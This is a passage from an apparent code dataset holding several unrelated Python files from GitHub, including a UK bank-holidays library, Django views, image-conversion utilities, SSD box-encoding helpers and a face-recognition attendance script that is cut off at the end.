bool(holiday.get('bunting')),\n }\n except (KeyError, ValueError):\n logger.warning('Holiday could not be parsed')\n logger.debug(holiday, exc_info=True)\n\n self.data = {\n division: sorted(filter(None, map(map_holiday, item.get('events', []))),\n key=lambda e: e['date'])\n for division, item in data.items()\n }\n\n def __iter__(self):\n \"\"\"\n Iterates over the current year's holidays that are common to *all* divisions\n :return: list of dicts with titles, dates, etc\n \"\"\"\n return iter(self.get_holidays(year=datetime.date.today().year))\n\n def get_holidays(self, division=None, year=None):\n \"\"\"\n Gets a list of all known bank holidays, optionally filtered by division and/or year\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param year: defaults to all available years\n :return: list of dicts with titles, dates, etc\n \"\"\"\n if division:\n holidays = self.data[division]\n else:\n holidays = self.data[self.ENGLAND_AND_WALES]\n dates_in_common = functools.reduce(\n set.intersection,\n (\n set(map(lambda holiday: holiday['date'], division_holidays))\n for division, division_holidays in self.data.items()\n ),\n )\n holidays = filter(lambda holiday: holiday['date'] in dates_in_common, holidays)\n if year:\n holidays = filter(lambda holiday: holiday['date'].year == year, holidays)\n return list(holidays)\n\n def _get_known_holiday_date_set(self, division=None):\n \"\"\"\n Returns an unordered set of all known bank holiday dates\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n \"\"\"\n if division not in self._get_known_holiday_date_set_cache:\n self._get_known_holiday_date_set_cache[division] = set(\n holiday['date']\n for holiday in self.get_holidays(division=division)\n )\n return self._get_known_holiday_date_set_cache[division]\n\n def is_holiday(self, date, division=None):\n \"\"\"\n True if the date is a known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param date: the date to check\n :param division: see division constants; defaults to common holidays\n :return: bool\n \"\"\"\n return date in self._get_known_holiday_date_set(division=division)\n\n def is_work_day(self, date, division=None):\n \"\"\"\n True if the date is not a weekend or a known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param date: the date to check\n :param division: see division constants; defaults to common holidays\n :return: bool\n \"\"\"\n return date.weekday() not in self.weekend and date not in self._get_known_holiday_date_set(division=division)\n\n def get_next_holiday(self, division=None, date=None):\n \"\"\"\n Returns the next known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: dict or None\n \"\"\"\n date = date or datetime.date.today()\n for holiday in self.get_holidays(division=division):\n if holiday['date'] > date:\n return holiday\n\n def get_prev_holiday(self, division=None, date=None):\n \"\"\"\n Returns the previous known bank holiday\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: dict or None\n \"\"\"\n date = date or datetime.date.today()\n for holiday in reversed(self.get_holidays(division=division)):\n if holiday['date'] < date:\n return holiday\n\n def get_next_work_day(self, division=None, date=None):\n \"\"\"\n Returns the next work day, skipping weekends and bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: datetime.date; NB: get_next_holiday returns a dict\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date += one_day\n if self.is_work_day(date, division=division):\n return date\n\n def get_prev_work_day(self, division=None, date=None):\n \"\"\"\n Returns the previous work day, skipping weekends and bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are returned.\n :param division: see division constants; defaults to common holidays\n :param date: search starting from this date; defaults to today\n :return: datetime.date; NB: get_next_holiday returns a dict\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date -= one_day\n if self.is_work_day(date, division=division):\n return date\n\n def holidays_after(self, division=None, date=None):\n \"\"\"\n Yields known bank holidays in chronological order\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting after this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n holidays = self.get_holidays(division=division)\n yield from filter(lambda holiday: holiday['date'] > date, holidays)\n\n def holidays_before(self, division=None, date=None):\n \"\"\"\n Yields known bank holidays in reverse chronological order\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting before this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n holidays = reversed(self.get_holidays(division=division))\n yield from filter(lambda holiday: holiday['date'] < date, holidays)\n\n def work_days_after(self, division=None, date=None):\n \"\"\"\n Yields an infinite series of work days in chronological order skipping weekends and known bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting after this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date += one_day\n if self.is_work_day(date, division=division):\n yield date\n\n def work_days_before(self, division=None, date=None):\n \"\"\"\n Yields an infinite series of work days in reverse chronological order skipping weekends and known bank holidays\n NB: If no division is specified, only holidays common to *all* divisions are yielded.\n :param division: see division constants; defaults to common holidays\n :param date: starting before this date; defaults to today\n \"\"\"\n date = date or datetime.date.today()\n one_day = datetime.timedelta(days=1)\n while True:\n date -= one_day\n if self.is_work_day(date, division=division):\n yield date\n","repo_name":"ministryofjustice/govuk-bank-holidays","sub_path":"govuk_bank_holidays/bank_holidays.py","file_name":"bank_holidays.py","file_ext":"py","file_size_in_byte":10978,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"40"} +{"seq_id":"39379066878","text":"from .forms import ResendActivationEmailForm, SettingsForm\nfrom .helpers import mk_paginator, add_csrf\nfrom django.http import HttpResponseRedirect, Http404\nfrom django.core import signing\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\nfrom django.shortcuts import render, get_object_or_404, render_to_response\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\n\ndef err404(request):\n return render(render, 'errorpages/404.html', status=404)\n\ndef err500(request):\n return render(render, 'errorpages/50x.html', status=500)\n\ndef view_profile(request, **kwargs):\n context = {}\n\n username = kwargs.get('username')\n if username:\n context['profile'] = get_object_or_404(User, username=username)\n elif request.user.is_authenticated():\n context['profile'] = request.user\n else:\n raise Http404 # Case where user gets to this view anonymously for non-existent user\n\n return render(request, 'registration/profile.html', context)\n\n@login_required\ndef edit_settings(request, **kwargs):\n user = request.user\n form = SettingsForm(initial={'email': request.user.email}, instance=request.user.profile)\n\n if request.method == 'POST':\n form = SettingsForm(request.POST, request.FILES, instance=request.user.profile)\n\n if form.has_changed():\n if form.is_valid():\n up = form.save(commit=False)\n up.user = request.user\n up.save()\n\n email = form.cleaned_data['email']\n user.email = email\n user.save()\n\n messages.success(request, 'Profile details updated.')\n\n return render_to_response('registration/settings.html', {\n 'form': form,\n 'profile': request.user.profile,\n }, context_instance=RequestContext(request))\n\ndef resend_activation_email(request):\n\n email_body_template = 'registration/activation_email.txt'\n email_subject_template = 'registration/activation_email_subject.txt'\n\n if not request.user.is_anonymous():\n return HttpResponseRedirect('/')\n\n context = {}\n\n form = None\n if request.method == 'POST':\n form = ResendActivationEmailForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data[\"email\"]\n users = User.objects.filter(email=email, is_active=0)\n\n if not users.count():\n form._errors[\"email\"] = [\"This email is not registered or already activated.\"]\n\n REGISTRATION_SALT = getattr(settings, 'REGISTRATION_SALT', 'registration')\n for user in users:\n activation_key = signing.dumps(\n obj=getattr(user, user.USERNAME_FIELD),\n salt=REGISTRATION_SALT,\n )\n context = {}\n context['activation_key'] = activation_key\n context['expiration_days'] = settings.ACCOUNT_ACTIVATION_DAYS\n context['site'] = get_current_site(request)\n\n subject = render_to_string(email_subject_template, context)\n # Force subject to a single line to avoid header-injection\n # issues.\n subject = ''.join(subject.splitlines())\n message = render_to_string(email_body_template, context)\n user.email_user(subject, message, settings.DEFAULT_FROM_EMAIL)\n return render(request, 'registration/resend_activation_email_done.html')\n\n if not form:\n form = ResendActivationEmailForm()\n\n context = {\"form\" : form}\n return render(request, 'registration/resend_activation_email_form.html', context)\n","repo_name":"LunaSquee/lunasqu.ee-django","sub_path":"personal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33213619226","text":"# Define some status global variable that is filled by other module\n# count the status variable and provide statistics \n# status variables -> is Runlenght valid from mesh structure, mesh vectors, DCT blocks\nimport collections as col\nimport huffman as hoff\nimport configuration as cfg\n\nmeshStruct_isRunLenghtCodingValid_Validcount = 0\nmeshVector_isRunLenghtCodingValid_Validcount = 0\nDCT_isRunLenghtCodingValid_Validcount = 0\n\nmeshStruct_isRunLenghtCodingValid_InValidcount = 0\nmeshVector_isRunLenghtCodingValid_InValidcount = 0\nDCT_isRunLenghtCodingValid_InValidcount = 0\n\nmeshStruct_Symbols_count_dic = {}\nmeshVector_Symbols_count_dic = {}\nDCT_Symbols_count_dic = {}\n\nmeshStruct_Symbols_prob_dic = {}\nmeshVector_Symbols_prob_dic = {}\nDCT_Symbols_prob_dic = {}\n\nmeshStruct_total_symbols_count = 0\nmeshVector_total_symbols_count = 0\nDCT_total_symbols_count = 0\n\nDCT_Total_Count = 0\nmesh_Total_Count = 0\n\ndef DoStatistics_mesh(encoded_meshStruct_list, encoded_meshVector_list):\n global mesh_Total_Count, meshStruct_total_symbols_count, meshStruct_Symbols_count_dic, meshVector_total_symbols_count, meshVector_Symbols_count_dic\n\n # count the total mesh cycles\n mesh_Total_Count = mesh_Total_Count + 1\n # Huffman\n ## count the total number of symbols then count unique symbols then append on dictionary\n if not encoded_meshStruct_list:\n for encoded_meshStruct in encoded_meshStruct_list:\n meshStruct_total_symbols_count = meshStruct_total_symbols_count + len(encoded_meshStruct)\n for symbol, count in col.Counter(encoded_meshStruct).items():\n if symbol in meshStruct_Symbols_count_dic:\n meshStruct_Symbols_count_dic[symbol] = meshStruct_Symbols_count_dic[symbol] + count\n else:\n meshStruct_Symbols_count_dic[symbol] = count\n\n for encoded_meshVector in encoded_meshVector_list:\n meshVector_total_symbols_count = meshVector_total_symbols_count + len(encoded_meshVector)\n for symbol, count in col.Counter(encoded_meshVector).items():\n if symbol in meshVector_Symbols_count_dic:\n meshVector_Symbols_count_dic[symbol] = meshVector_Symbols_count_dic[symbol] + count\n else:\n meshVector_Symbols_count_dic[symbol] = count\n for x in range(-7, 8, 1):\n if x in meshVector_Symbols_count_dic:\n pass\n else:\n meshVector_Symbols_count_dic[x] = 1\n meshVector_total_symbols_count += 1\n #\n return\n\ndef DoStatistics_DCT(encoded_dct_list):\n global DCT_Total_Count, DCT_total_symbols_count, DCT_Symbols_count_dic\n\n # count the total DCT cycles\n DCT_Total_Count = DCT_Total_Count + 1\n # Huffman\n ## count the total number of symbols then count unique symbols then append on dictionary\n for encoded_dct in encoded_dct_list:\n DCT_total_symbols_count = DCT_total_symbols_count + len(encoded_dct)\n for symbol, count in col.Counter(encoded_dct).items():\n if symbol in DCT_Symbols_count_dic:\n DCT_Symbols_count_dic[symbol] = DCT_Symbols_count_dic[symbol] + count\n else:\n DCT_Symbols_count_dic[symbol] = count\n for x in range(128):\n if x in DCT_Symbols_count_dic:\n pass\n else:\n DCT_Symbols_count_dic[x] = 1\n DCT_total_symbols_count += 1\n return\n\n\ndef GetProbability_GenerateHoffmanTable():\n for symbol, count in DCT_Symbols_count_dic.items():\n DCT_Symbols_prob_dic[symbol] = count/DCT_total_symbols_count\n for symbol, count in meshVector_Symbols_count_dic.items():\n meshVector_Symbols_prob_dic[symbol] = count / meshVector_total_symbols_count\n for symbol, count in meshStruct_Symbols_count_dic.items():\n meshStruct_Symbols_prob_dic[symbol] = count / meshStruct_total_symbols_count\n\n hoff.generate_coding_dictionary(cfg.DCT_FRAME, DCT_Symbols_prob_dic)\n # hoff.generate_coding_dictionary(cfg.MESH_FRAME, meshStruct_Symbols_prob_dic)\n hoff.generate_coding_dictionary(cfg.MOTION_VECTORS_FRAME, meshVector_Symbols_prob_dic)\n\n return","repo_name":"ahmedhussien91/VLC","sub_path":"statistics_module.py","file_name":"statistics_module.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21845138622","text":"from flask import Flask, request, json, Response, jsonify, make_response\nfrom apscheduler.schedulers.background import BackgroundScheduler\n\n# Instantiating the Flask application\napplication = Flask(__name__)\n\n# Instantiating the scheduler for the cronjob\nsched = BackgroundScheduler(daemon = True)\nsched.start()\n\n# Defining a cronjob function to run alongside the Flask app\n@sched.scheduled_job(trigger = 'cron', minute = '*')\ndef print_hello():\n print('Hello world!')\n\n# Defining a single API endpoint\n@application.route('/test')\ndef test_func():\n js = json.dumps({'Test': 'Successful!'})\n return Response(json.dumps(js), status = 200, mimetype = 'application/json')\n\nif __name__ == '__main__':\n # Starting Flask application\n application.run(host = '0.0.0.0')\n","repo_name":"dkhundley/ds-quick-tips","sub_path":"002_flask_cronjob/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"40"} +{"seq_id":"70295817082","text":"\"\"\"\n * (c) 2019-2021. Nurul GC\n * Jovem Programador\n * Estudante de Engenharia de Telecomunicações\n * Tecnologia de Informação e de Medicina.\n * Foco Fé Força Paciência\n * Allah no Comando.\n\n - MODULO RESPONSAVEL PELA EDIÇÃO DAS IMAGENS\n\"\"\"\n\nfrom datetime import date\nimport logging\nimport os\nfrom subprocess import getoutput\nfrom typing import List\n\nfrom fpdf import FPDF\nimport imageio\nimport PIL\n\n\ndef dimensao_imagem(_filename: str) -> tuple:\n \"\"\"identifica as dimensões da imagem\n\n :param _filename: nome e localização da imagem\n :return: uma tupla contendo a largura e a altura da imagem\"\"\"\n imagem = PIL.Image.open(_filename)\n return imagem.size\n\n\ndef tamanho_imagem(_filename: str) -> str:\n \"\"\"calcula a quantidade de bytes da imagem\n\n :param _filename: nome e localização da imagem\n :return: o tamanho que a imagem ocupa no disco\"\"\"\n num = os.path.getsize(_filename)\n for x in ['bytes', 'KB', 'MB']:\n if num < 1024.0:\n return f\"{num:3.1f}{x}\"\n num /= 1024.0\n\n\ndef debugpath() -> str:\n if os.name == 'posix':\n home = getoutput('echo $HOME')\n return os.path.join(home, '.ima-debug')\n return '.ima-debug'\n\n\ndef tempdir() -> str:\n os.makedirs(f\"{debugpath()}/temp\", exist_ok=True)\n return f\"{debugpath()}/temp\"\n\n\nclass ImagEditor:\n \"\"\"ImaGC backend class\"\"\"\n\n def __init__(self, _dir_salvar: str = None):\n self.pdf = FPDF()\n self.dir_salvar = _dir_salvar\n\n def add_logo(self, _nome_logotipo: str, _nome_imagem: str = None, _dir_imagens: str = None):\n \"\"\"adicionar logotipo a outra imagem\n\n :param _nome_imagem: nome e localização da imagem\n :param _nome_logotipo: nome e localização do logotipo\n :param _dir_imagens: localização do directorio contendo as imagens\n :return: uma nova imagem contendo o logotipo no canto inferior direito\"\"\"\n if _dir_imagens and _nome_logotipo:\n SQUARE_FIT_SIZE = 100\n LOGO_FILENAME = _nome_logotipo\n logoIm = PIL.Image.open(LOGO_FILENAME)\n logoWidth, logoHeight = logoIm.size\n\n if (logoWidth and logoHeight) > SQUARE_FIT_SIZE:\n logoWidth = SQUARE_FIT_SIZE\n logoHeight = SQUARE_FIT_SIZE\n logoIm = logoIm.resize((logoWidth, logoHeight))\n\n for filename in os.listdir(_dir_imagens):\n try:\n if not filename.endswith(\".png\") and not filename.endswith(\".jpg\") and not filename.endswith(\".jpeg\"):\n continue\n elif filename in LOGO_FILENAME:\n continue\n else:\n im = PIL.Image.open(f\"{_dir_imagens}/{filename}\")\n width, height = im.size\n\n im.paste(logoIm, (width - logoWidth, height - logoHeight), logoIm)\n im.save(os.path.join(f'{self.dir_salvar}', f\"imagc-{filename}\"))\n logging.debug(f\"Adding logo to the '{filename}'... SUCCESSFULL!\")\n except Exception as erro:\n logging.critical(f\"- {erro}..\")\n raise Exception(erro)\n elif _nome_imagem and _nome_logotipo:\n SQUARE_FIT_SIZE = 100\n LOGO_FILENAME = _nome_logotipo\n logoIm = PIL.Image.open(LOGO_FILENAME)\n logoWidth, logoHeight = logoIm.size\n\n if (logoWidth and logoHeight) > SQUARE_FIT_SIZE:\n logoWidth = SQUARE_FIT_SIZE\n logoHeight = SQUARE_FIT_SIZE\n logoIm = logoIm.resize((logoWidth, logoHeight))\n\n filename = _nome_imagem\n im = PIL.Image.open(filename)\n width, height = im.size\n imagem = os.path.join(f\"{self.dir_salvar}/\", f\"imagc-{filename.split('/')[-1]}\")\n\n try:\n im.paste(logoIm, (width - logoWidth, height - logoHeight), logoIm)\n im.save(imagem)\n logging.debug(f\"Adding logo to the '{imagem}'... SUCCESSFULL!\")\n except Exception as erro:\n logging.critical(f\"{erro}..\")\n raise Exception(erro)\n\n def convertendo_gif(self, _images: List[str]):\n \"\"\"função conversora (images to gif)\n\n :param _images: lista de imagens\n :return: nova imagem (.gif),\n salva no directorio selecionado pelo utilizador\"\"\"\n if self.dir_salvar.endswith('.gif'):\n try:\n imgData = imageio.mimread(_images)\n imageio.mimsave(self.dir_salvar, imgData, duration=1.0)\n logging.debug(f\"Created the file '{self.dir_salvar}'.. SUCCESSFULLY!\")\n except Exception as erro:\n logging.critical(f\"- {erro}..\")\n raise Exception(erro)\n else:\n raise NameError('Invalid Name for file, should end with \".gif\"...')\n\n def convertendo_icone(self, _size: int, _nome_imagem: str):\n \"\"\"funcão conversora (image to ico)\n\n :param _nome_imagem: nome e localização da imagem\n :param _size: dimensão do icone\n :return: um novo ficheiro (.ico), salvo no directorio selecionado pelo utilizador\"\"\"\n nome = \"\"\n try:\n SIZES = [[(16, 16)], [(32, 32)], [(128, 128)], [(256, 256)]]\n img_to_icon = PIL.Image.open(_nome_imagem)\n if _size == 16:\n size = SIZES[0]\n for sz in size[0]:\n nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n img_to_icon.save(nome, sizes=size)\n logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n elif _size == 32:\n size = SIZES[1]\n for sz in size[0]:\n nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n img_to_icon.save(nome, sizes=size)\n logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n elif _size == 64:\n size = SIZES[2]\n for sz in size[0]:\n nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n img_to_icon.save(nome, sizes=size)\n logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n elif _size == 256:\n size = SIZES[3]\n for sz in size[0]:\n nome = f\"{self.dir_salvar}/imagc-{sz}x{sz}.ico\"\n img_to_icon.save(nome, sizes=size)\n logging.debug(f\"Created the icon '{nome}'.. SUCCESSFULLY!\")\n else:\n raise IndexError(\"Invalid size for the file, should had be set one of these [16, 32, 64, 256]!\")\n except Exception as erro:\n logging.critical(f\"- {erro}..\")\n raise Exception(erro)\n\n def convertendo_pdf(self, _images: List[str]):\n \"\"\"função conversora (images to pdf)\n\n :param _images: lista de imagens\n :return: novo documento (.pdf) contendo a imagem(ns) selecionada(s),\n salva no directorio selecionado pelo utilizador\"\"\"\n if self.dir_salvar.endswith('.pdf'):\n try:\n for image in _images:\n width, height = dimensao_imagem(_filename=image)\n if width > height:\n self.pdf.add_page('L')\n self.pdf.image(image, x=0, y=0, w=int(1122 / 3.75), h=int(793 / 3.75))\n elif width < height:\n self.pdf.add_page('P')\n self.pdf.image(image, x=0, y=0, w=int(793 / 3.75), h=int(1122 / 3.75))\n else:\n self.pdf.add_page('L')\n self.pdf.image(image, x=0, y=0, w=int(1122 / 3.75), h=int(793 / 3.75))\n self.pdf.output(self.dir_salvar, 'F')\n logging.debug(f\"Created the file '{self.dir_salvar}'.. SUCCESSFULLY!\")\n except Exception as erro:\n logging.critical(f\"{erro}..\")\n raise Exception(erro)\n else:\n raise NameError('Invalid Name for file, should end with \".pdf\"...')\n\n\nlogging.basicConfig(\n filename=f\"{debugpath()}/{date.today()}-imagc.log\",\n level=logging.DEBUG, format='\\n %(asctime)s - %(levelname)s - %(message)s'\n)\nlogging.info(f\"{'*' * 25} NEW DEBUG {'*' * 25}\")\n","repo_name":"ArtesGC/ImaGC","sub_path":"imagc/ie.py","file_name":"ie.py","file_ext":"py","file_size_in_byte":8334,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"7061861548","text":"from __future__ import absolute_import as _abs\nimport ctypes as _ctypes\nimport numpy as np\nfrom nnvm import symbol\nfrom nnvm._base import c_str, check_call, _LIB, c_array, nn_uint\n\nSessionHandle = _ctypes.c_void_p\nnn_float = _ctypes.c_float\n\ndef _get_numpy(cptr, dtype, shape):\n if dtype != 0:\n raise ValueError(\"only float32 is supported so far\")\n size = 1\n for s in shape:\n size *= s\n if size != 0 and shape:\n dbuffer = (nn_float * size).from_address(_ctypes.addressof(cptr.contents))\n return np.frombuffer(dbuffer, dtype=np.float32).reshape(shape).copy()\n else:\n return None\n\nclass Session(object):\n def __init__(self, config='cpu'):\n handle = SessionHandle()\n check_call(_LIB.NNSessionCreate(_ctypes.byref(handle), c_str(config)))\n self.handle = handle\n\n def __del__(self):\n check_call(_LIB.NNSessionClose(self.handle))\n\n def run(self, fetch, feed_dict=None):\n if isinstance(fetch, list):\n fetch = symbol.Group(fetch)\n feed_dict = feed_dict if feed_dict else {}\n feed_placeholders = []\n feed_dptr = []\n feed_dtype = []\n feed_shape_csr_ptr = [0]\n feed_shape_data = []\n src_list = []\n\n for k, v in feed_dict.items():\n assert isinstance(k, symbol.Symbol)\n assert isinstance(v, np.ndarray)\n feed_placeholders.append(k.handle)\n # only convert to float32 for now\n source_array = np.ascontiguousarray(v, dtype=np.float32)\n # leep src_list alive for the period\n src_list.append(source_array)\n feed_dptr.append(source_array.ctypes.data_as(_ctypes.c_void_p))\n feed_dtype.append(0)\n feed_shape_data.extend(source_array.shape)\n feed_shape_csr_ptr.append(len(feed_shape_data))\n out_size = nn_uint()\n out_dptr = _ctypes.POINTER(_ctypes.POINTER(nn_float))()\n out_dtype = _ctypes.POINTER(nn_uint)()\n out_shape_ndim = _ctypes.POINTER(nn_uint)()\n out_shape_data = _ctypes.POINTER(_ctypes.POINTER(nn_uint))()\n\n check_call(_LIB.NNSessionRun(\n self.handle, fetch.handle, nn_uint(len(src_list)),\n c_array(_ctypes.c_void_p, feed_placeholders),\n c_array(_ctypes.c_void_p, feed_dptr),\n c_array(nn_uint, feed_dtype),\n c_array(nn_uint, feed_shape_csr_ptr),\n c_array(nn_uint, feed_shape_data),\n _ctypes.byref(out_size),\n _ctypes.byref(out_dptr),\n _ctypes.byref(out_dtype),\n _ctypes.byref(out_shape_ndim),\n _ctypes.byref(out_shape_data)))\n ret = []\n for i in range(out_size.value):\n shape = tuple(out_shape_data[i][:out_shape_ndim[i]])\n ret.append(_get_numpy(out_dptr[i], out_dtype[i], shape))\n\n return ret[0] if len(ret) == 1 else ret\n","repo_name":"tqchen/tinyflow","sub_path":"python/tinyflow/_session.py","file_name":"_session.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"en","doc_type":"code","stars":1986,"dataset":"github-code","pt":"40"} +{"seq_id":"29279424286","text":"import torch\n\n\ndef xywh_to_xyxy(boxes):\n return torch.cat((boxes[:, :2] - boxes[:, 2:] / 2, # xmin, ymin\n boxes[:, :2] + boxes[:, 2:] / 2), 1) # xmax, ymax\n\n\ndef xyxy_to_xywh(boxes):\n return torch.cat((boxes[:, 2:] + boxes[:, :2]) / 2, # cx, cy\n boxes[:, 2:] - boxes[:, :2], 1) # w, h\n\n\ndef IoU(box_a, box_b):\n # box_a and box_b are in xyxy form\n max_xy = torch.min(box_a[:, 2:].unsqueeze(1), box_b[:, 2:].unsqueeze(0))\n min_xy = torch.max(box_a[:, :2].unsqueeze(1), box_b[:, :2].unsqueeze(0))\n inter = torch.clamp((max_xy - min_xy), min=0, max=None)\n inter = inter[:, :, 0] * inter[:, :, 1]\n\n area_a = ((box_a[:, 2] - box_a[:, 0]) * (box_a[:, 3] - box_a[:, 1])).unsqueeze(1) # [A,B]\n area_b = ((box_b[:, 2] - box_b[:, 0]) * (box_b[:, 3] - box_b[:, 1])).unsqueeze(0) # [A,B]\n union = area_a + area_b - inter\n return inter / union # [A,B]\n\n\ndef encode(gt_boxes, priors):\n # gt_boxes and priors are in xyxy form\n # distance between match center and prior's center\n g_cxcy = ((gt_boxes[:, :2] + gt_boxes[:, 2:]) / 2 - priors[:, :2]) / (priors[:, 2:] * 0.1)\n # match wh / prior wh\n g_wh = torch.log((gt_boxes[:, 2:] - gt_boxes[:, :2]) / priors[:, 2:]) / 0.2\n\n # return target for smooth_l1_loss\n return torch.cat([g_cxcy, g_wh], 1) # [num_priors,4]\n\n\n# Adapted from https://github.com/Hakuyume/chainer-ssd\ndef decode(loc, priors):\n # loc and priors are in xywh form\n boxes = torch.cat((priors[:, :2] + loc[:, :2] * 0.1 * priors[:, 2:],\n priors[:, 2:] * torch.exp(loc[:, 2:] * 0.2)), 1)\n # xywh -> xyxy\n boxes[:, :2] -= boxes[:, 2:] / 2\n boxes[:, 2:] += boxes[:, :2]\n return boxes\n\n\ndef decode_batch(loc, priors):\n # loc and priors are in xywh form\n # loc shape: [batch_size, num_priors, 4]\n # priors shape: [num_priors, 4]\n boxes = torch.cat((\n priors[:, :2][None, :, :] + loc[:, :, :2] * 0.1 * priors[:, 2:][None, :, :],\n priors[:, 2:][None, :, :] * torch.exp(loc[:, :, 2:] * 0.2)), 2)\n\n # xywh -> xyxy\n boxes[:, :, :2] -= boxes[:, :, 2:] / 2\n boxes[:, :, 2:] += boxes[:, :, :2]\n return boxes\n","repo_name":"zzzxxxttt/pytorch_simple_SSD","sub_path":"utils/bbox2target.py","file_name":"bbox2target.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"9247860465","text":"import utils\nimport operations\n\n\ndef main():\n utils.header()\n account = operations.auth_account()\n if account :\n print('Olá ' + account['customer_name'])\n option_typed = operations.get_menu_options_typed(account)\n operations.do_operation(account, option_typed) \n else:\n print('Conta inválida')\n\nwhile True:\n main()\n utils.pause()\n utils.clear() \n","repo_name":"dinaerteneto/python-gerenciando-arquivos","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9918310620","text":"import sys\r\nsys.setrecursionlimit (30000)\r\ndef palindrome(string):\r\n if len(string)<=1:\r\n return True\r\n else:\r\n if string[0]==string[len(string)-1]:\r\n return palindrome(string[1:len(string)-1])\r\n else:\r\n return False\r\ndef prime(a,b):\r\n\r\n if (b>a**(1/2)):\r\n return True\r\n if a%b==0:\r\n return False\r\n else:\r\n return prime(a,b+1)\r\ndef prime_palindrome(a,b):\r\n if a>b:\r\n return\r\n else:\r\n if palindrome(str(a)) and prime(a,2):\r\n print(a)\r\n prime_palindrome(a+1,b)\r\na=eval(input(\"Enter the starting point N:\\n\"))\r\nif a==1:\r\n a= a+1\r\nb=eval(input(\"Enter the ending point M:\\n\"))\r\nprint(\"The palindromic primes are:\")\r\nprime_palindrome(a,b)\r\n\r\n ","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_8/mnhper001/question4.py","file_name":"question4.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36431069039","text":"import datetime\nimport os\nimport time\nimport pyautogui\nimport numpy as np\nimport cv2\nimport pandas as pd\nimport db\nimport time\n\n#-------------------------\ndef recognize_attendence():\n recognizer = cv2.face.LBPHFaceRecognizer_create() # cv2.createLBPHFaceRecognizer()\n recognizer.read(\"TrainingImageLabel\"+os.sep+\"Trainner.yml\")\n harcascadePath = \"haarcascade_frontalface_default.xml\"\n faceCascade = cv2.CascadeClassifier(harcascadePath)\n df = db.execute(\"SELECT * FROM student\")\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n # Initialize and start realtime video capture\n cam = cv2.VideoCapture(0)\n cam.set(3, 640) # set video width\n cam.set(4, 480) # set video height\n # Define min window size to be recognized as a face\n minW = 0.1 * cam.get(3)\n minH = 0.1 * cam.get(4)\n attended = False\n color = (10, 159, 255)\n while True:\n ret, img = cam.read()\n if ret:\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(gray, 1.2, 5,minSize = (int(minW), int(minH)),flags = cv2.CASCADE_SCALE_IMAGE)\n for(x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x+w, y+h), color , 2)\n Id, conf = recognizer.predict(gray[y:y+h, x:x+w])\n\n if conf < 100:\n\n aa = [i for i in df if Id == i[0]]\n confstr = \" {0}%\".format(round(100 - conf))\n tt = str(Id)+\"-\"+aa[0][1]\n else:\n Id = ' Unknown '\n tt = str(Id)\n confstr = \" {0}%\".format(round(100 - conf))\n\n\n if(100-conf) > 70 and (100-conf) < 99:\n tt = tt + \" [Pass]\"\n cv2.putText(img, str(tt), (x+5,y-5), font, 1, (255, 255, 255), 2)\n date = datetime.datetime.utcnow()\n attended = True\n\n db.execute(\"INSERT INTO absensi (user_id,waktu) VALUES (%s,'%s')\"%(Id,date))\n \n else:\n cv2.putText(img, str(tt), (x + 5, y - 5), font, 1, (255, 255, 